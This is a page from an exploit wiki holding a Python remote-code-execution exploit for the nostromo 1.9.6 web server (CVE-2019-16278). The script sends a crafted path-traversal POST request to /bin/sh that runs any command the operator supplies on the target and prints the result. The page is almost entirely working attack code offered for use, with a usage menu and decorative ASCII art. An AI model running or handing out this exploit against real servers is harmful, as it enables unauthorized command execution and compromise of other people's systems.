pwnwiki.com
,
EXP
# Exploit Title: nostromo 1.9.6 - Remote Code Execution # Date: 2019-12-31 # Exploit Author: Kr0ff # Vendor Homepage: # Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz # Version: 1.9.6 # Tested on: Debian # CVE : CVE-2019-16278 cve2019_16278.py #!/usr/bin/env python import sys import socket art = """ _____-2019-16278 _____ _______ ______ _____\ \ _____\ \_\ | | | / / | | / /| || / / /|/ / /___/| / / /____/||\ \ \ |/| |__ |___|/ | | |____|/ \ \ \ | | | \ | | _____ \| \| | | __/ __ |\ \|\ \ |\ /| |\ \ / \ | \_____\| | | \_______/ | | \____\/ | | | /____/| \ | | / | | |____/| \|_____| || \|_____|/ \|____| | | |____|/ |___|/ """ help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>' def connect(soc): response = "" try: while True: connection = soc.recv(1024) if len(connection) == 0: break response += connection except: pass return response def cve(target, port, cmd): soc = socket.socket() soc.connect((target, int(port))) payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd) soc.send(payload) receive = connect(soc) print(receive) if __name__ == "__main__": print(art) try: target = sys.argv1 port = sys.argv2 cmd = sys.argv3 cve(target, port, cmd) except IndexError: print(help_menu)
pwnwiki.com